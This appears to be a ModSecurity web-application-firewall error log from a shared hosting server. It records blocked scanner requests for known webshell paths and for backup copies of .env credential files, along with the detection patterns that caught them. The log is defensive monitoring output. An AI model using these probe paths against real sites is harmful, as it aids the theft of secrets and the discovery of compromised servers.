[Tue May 26 13:48:36.172707 2026] [security2:error] [pid 555743:tid 555989] [client 20.205.111.246:1932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/asus.php"] [unique_id "ahVXXMjqAquC0YaxQjCrvAAAAX4"]
[Tue May 26 13:48:36.578935 2026] [security2:error] [pid 555743:tid 555998] [client 15.235.169.50:57563] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/web.php"] [unique_id "ahVXXMjqAquC0YaxQjCrzQAAAYc"]
[Tue May 26 13:48:36.593755 2026] [security2:error] [pid 555743:tid 555875] [client 20.206.67.134:1480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mosykay.com"] [uri "/wp-plain.php"] [unique_id "ahVXXMjqAquC0YaxQjCrzgAAAQw"], referer: www.google.com
[Tue May 26 13:48:36.747736 2026] [security2:error] [pid 555743:tid 555879] [client 5.255.121.146:52592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.production.copy"] [unique_id "ahVXXMjqAquC0YaxQjCr1gAAARA"]
[Tue May 26 13:48:36.866132 2026] [security2:error] [pid 555743:tid 555916] [client 129.222.147.134:44400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXXMjqAquC0YaxQjCr5wAAATU"]
[Tue May 26 13:48:36.867083 2026] [security2:error] [pid 555743:tid 555916] [client 129.222.147.134:44400] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXXMjqAquC0YaxQjCr5wAAATU"]
[Tue May 26 13:48:36.869116 2026] [security2:error] [pid 555743:tid 555997] [client 20.205.111.246:1659] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/about.php"] [unique_id "ahVXXMjqAquC0YaxQjCr6AAAAYY"]
[Tue May 26 13:48:37.065190 2026] [security2:error] [pid 555743:tid 555880] [client 15.235.169.50:57665] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/ws.php"] [unique_id "ahVXXcjqAquC0YaxQjCr8AAAARE"]
[Tue May 26 13:48:37.097857 2026] [security2:error] [pid 555743:tid 555941] [client 20.206.67.134:5843] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mosykay.com"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVXXcjqAquC0YaxQjCr9AAAAU4"]
[Tue May 26 13:48:37.124359 2026] [security2:error] [pid 555743:tid 555967] [client 5.255.121.146:52926] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.production.orig"] [unique_id "ahVXXcjqAquC0YaxQjCr9wAAAWg"]
[Tue May 26 13:48:37.125292 2026] [security2:error] [pid 555743:tid 555915] [client 5.255.121.146:52782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.swp"] [unique_id "ahVXXcjqAquC0YaxQjCr-gAAATQ"]
[Tue May 26 13:48:37.125905 2026] [security2:error] [pid 555743:tid 555873] [client 5.255.121.146:52810] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.local.bak"] [unique_id "ahVXXcjqAquC0YaxQjCr-wAAAQo"]
[Tue May 26 13:48:37.125926 2026] [security2:error] [pid 555743:tid 555920] [client 5.255.121.146:52658] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.bak"] [unique_id "ahVXXcjqAquC0YaxQjCr-QAAATk"]
[Tue May 26 13:48:37.126561 2026] [security2:error] [pid 555743:tid 555989] [client 5.255.121.146:52788] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.orig"] [unique_id "ahVXXcjqAquC0YaxQjCr_gAAAX4"]
[Tue May 26 13:48:37.126784 2026] [security2:error] [pid 555743:tid 555970] [client 5.255.121.146:52850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.local.swp"] [unique_id "ahVXXcjqAquC0YaxQjCr_QAAAWs"]
[Tue May 26 13:48:37.127072 2026] [security2:error] [pid 555743:tid 555915] [client 5.255.121.146:52752] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.production.old"] [unique_id "ahVXXcjqAquC0YaxQjCsAgAAATQ"]
[Tue May 26 13:48:37.127420 2026] [security2:error] [pid 555743:tid 555913] [client 5.255.121.146:52818] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.local.old"] [unique_id "ahVXXcjqAquC0YaxQjCsAQAAATI"]
[Tue May 26 13:48:37.127579 2026] [security2:error] [pid 555743:tid 555943] [client 5.255.121.146:52910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.production.swp"] [unique_id "ahVXXcjqAquC0YaxQjCsBAAAAVA"]
[Tue May 26 13:48:37.127921 2026] [security2:error] [pid 555743:tid 555896] [client 5.255.121.146:52826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.local.backup"] [unique_id "ahVXXcjqAquC0YaxQjCsAAAAASE"]
[Tue May 26 13:48:37.127969 2026] [security2:error] [pid 555743:tid 555901] [client 5.255.121.146:52868] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.production.bak"] [unique_id "ahVXXcjqAquC0YaxQjCr_wAAASY"]
[Tue May 26 13:48:37.128069 2026] [security2:error] [pid 555743:tid 555989] [client 5.255.121.146:52904] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.production~"] [unique_id "ahVXXcjqAquC0YaxQjCsBwAAAX4"]
[Tue May 26 13:48:37.128408 2026] [security2:error] [pid 555743:tid 555920] [client 5.255.121.146:52760] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env~"] [unique_id "ahVXXcjqAquC0YaxQjCsBQAAATk"]
[Tue May 26 13:48:37.128905 2026] [security2:error] [pid 555743:tid 555942] [client 5.255.121.146:52838] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.local~"] [unique_id "ahVXXcjqAquC0YaxQjCsCQAAAU8"]
[Tue May 26 13:48:37.129298 2026] [security2:error] [pid 555743:tid 555897] [client 5.255.121.146:52796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.copy"] [unique_id "ahVXXcjqAquC0YaxQjCsCgAAASI"]
[Tue May 26 13:48:37.129852 2026] [security2:error] [pid 555743:tid 555969] [client 5.255.121.146:52862] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.local.copy"] [unique_id "ahVXXcjqAquC0YaxQjCsDAAAAWo"]
[Tue May 26 13:48:37.130508 2026] [security2:error] [pid 555743:tid 555924] [client 5.255.121.146:52732] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.old"] [unique_id "ahVXXcjqAquC0YaxQjCsCwAAAT0"]
[Tue May 26 13:48:37.130514 2026] [security2:error] [pid 555743:tid 555920] [client 5.255.121.146:52860] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.local.orig"] [unique_id "ahVXXcjqAquC0YaxQjCsDwAAATk"]
[Tue May 26 13:48:37.130725 2026] [security2:error] [pid 555743:tid 555986] [client 5.255.121.146:52880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.production.backup"] [unique_id "ahVXXcjqAquC0YaxQjCsCAAAAXs"]
[Tue May 26 13:48:37.131126 2026] [security2:error] [pid 555743:tid 555994] [client 5.255.121.146:52768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "stockmarketanalysis.jiyani.in"] [uri "/.env.backup"] [unique_id "ahVXXcjqAquC0YaxQjCsEAAAAYM"]
[Tue May 26 13:48:37.538153 2026] [security2:error] [pid 555743:tid 555960] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXXMjqAquC0YaxQjCr6wAAAWE"]
[Tue May 26 13:48:37.560995 2026] [security2:error] [pid 555743:tid 555957] [client 15.235.169.50:57759] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/simple.php"] [unique_id "ahVXXcjqAquC0YaxQjCsJQAAAV4"]
[Tue May 26 13:48:37.569128 2026] [security2:error] [pid 555743:tid 555909] [client 20.205.111.246:1977] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/atomlib.php"] [unique_id "ahVXXcjqAquC0YaxQjCsJwAAAS4"]
[Tue May 26 13:48:37.860229 2026] [security2:error] [pid 555743:tid 555920] [client 20.206.67.134:5856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mosykay.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVXXcjqAquC0YaxQjCsOAAAATk"], referer: www.google.com
[Tue May 26 13:48:38.029035 2026] [security2:error] [pid 555743:tid 555992] [client 15.235.169.50:57878] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/upgrade/about.php"] [unique_id "ahVXXsjqAquC0YaxQjCsOQAAAYE"]
[Tue May 26 13:48:38.274400 2026] [security2:error] [pid 555743:tid 555959] [client 20.205.111.246:1568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/alfa-rex.php7"] [unique_id "ahVXXsjqAquC0YaxQjCsPgAAAWA"]
[Tue May 26 13:48:38.489742 2026] [security2:error] [pid 555743:tid 555996] [client 15.235.169.50:57959] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVXXsjqAquC0YaxQjCsggAAAYU"]
[Tue May 26 13:48:38.784383 2026] [security2:error] [pid 555743:tid 555954] [client 185.191.171.18:30966] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-6th/day/2023-01-26/"] [unique_id "ahVXXsjqAquC0YaxQjCsiQAAAVs"]
[Tue May 26 13:48:38.784482 2026] [security2:error] [pid 555743:tid 555954] [client 185.191.171.18:30966] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-6th/day/2023-01-26/"] [unique_id "ahVXXsjqAquC0YaxQjCsiQAAAVs"]
[Tue May 26 13:48:38.954282 2026] [security2:error] [pid 555743:tid 555973] [client 20.205.111.246:1617] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/b.php"] [unique_id "ahVXXsjqAquC0YaxQjCslAAAAW4"]
[Tue May 26 13:48:38.973770 2026] [security2:error] [pid 555743:tid 555974] [client 15.235.169.50:58031] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVXXsjqAquC0YaxQjCslwAAAW8"]
[Tue May 26 13:48:39.210935 2026] [security2:error] [pid 555743:tid 555964] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXXsjqAquC0YaxQjCsiAAAAWU"]
[Tue May 26 13:48:39.448694 2026] [security2:error] [pid 555743:tid 555949] [client 15.235.169.50:58103] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/user/about.php"] [unique_id "ahVXX8jqAquC0YaxQjCspQAAAVY"]
[Tue May 26 13:48:39.649124 2026] [security2:error] [pid 555743:tid 555883] [client 20.205.111.246:1575] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/buy.php"] [unique_id "ahVXX8jqAquC0YaxQjCsrQAAARQ"]
[Tue May 26 13:48:39.935340 2026] [security2:error] [pid 555743:tid 555922] [client 15.235.169.50:58178] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/upgrade/cloud.php"] [unique_id "ahVXX8jqAquC0YaxQjCstQAAATs"]
[Tue May 26 13:48:40.074738 2026] [security2:error] [pid 555743:tid 555973] [client 20.206.67.134:1473] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mosykay.com"] [uri "/jujwbdei.php"] [unique_id "ahVXYMjqAquC0YaxQjCsuwAAAW4"], referer: www.google.com
[Tue May 26 13:48:40.393269 2026] [security2:error] [pid 555743:tid 555916] [client 20.205.111.246:1076] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/bless.php"] [unique_id "ahVXYMjqAquC0YaxQjCsxgAAATU"]
[Tue May 26 13:48:40.426050 2026] [security2:error] [pid 555743:tid 555926] [client 15.235.169.50:58250] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/moon.php"] [unique_id "ahVXYMjqAquC0YaxQjCsyAAAAT8"]
[Tue May 26 13:48:40.441634 2026] [security2:error] [pid 555743:tid 555909] [client 2.58.56.196:54482] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVXYMjqAquC0YaxQjCsxQAAAS4"], referer: www.google.com
[Tue May 26 13:48:40.489399 2026] [security2:error] [pid 555743:tid 555921] [client 2.58.56.196:54481] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahVXYMjqAquC0YaxQjCsyQAAATo"]
[Tue May 26 13:48:40.502978 2026] [security2:error] [pid 555743:tid 555940] [client 2.58.56.196:54478] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/wp-plain.php"] [unique_id "ahVXYMjqAquC0YaxQjCsygAAAU0"], referer: www.google.com
[Tue May 26 13:48:40.680557 2026] [security2:error] [pid 555743:tid 555938] [client 2.58.56.196:54488] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/avpbedjo.php"] [unique_id "ahVXYMjqAquC0YaxQjCs1QAAAUs"], referer: www.google.com
[Tue May 26 13:48:40.898952 2026] [security2:error] [pid 555743:tid 555976] [client 15.235.169.50:58353] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/inc.php"] [unique_id "ahVXYMjqAquC0YaxQjCs3gAAAXE"]
[Tue May 26 13:48:40.979379 2026] [security2:error] [pid 555743:tid 555874] [client 2.58.56.196:54516] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVXYMjqAquC0YaxQjCs4gAAAQs"], referer: www.google.com
[Tue May 26 13:48:41.077712 2026] [http2:info] [pid 560287:tid 560287] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 13:48:41.144192 2026] [security2:error] [pid 555743:tid 555925] [client 20.205.111.246:1572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/class-t.api.php"] [unique_id "ahVXYcjqAquC0YaxQjCs5wAAAT4"]
[Tue May 26 13:48:41.222184 2026] [security2:error] [pid 555743:tid 555999] [client 20.206.67.134:5102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mosykay.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVXYcjqAquC0YaxQjCs7gAAAYg"]
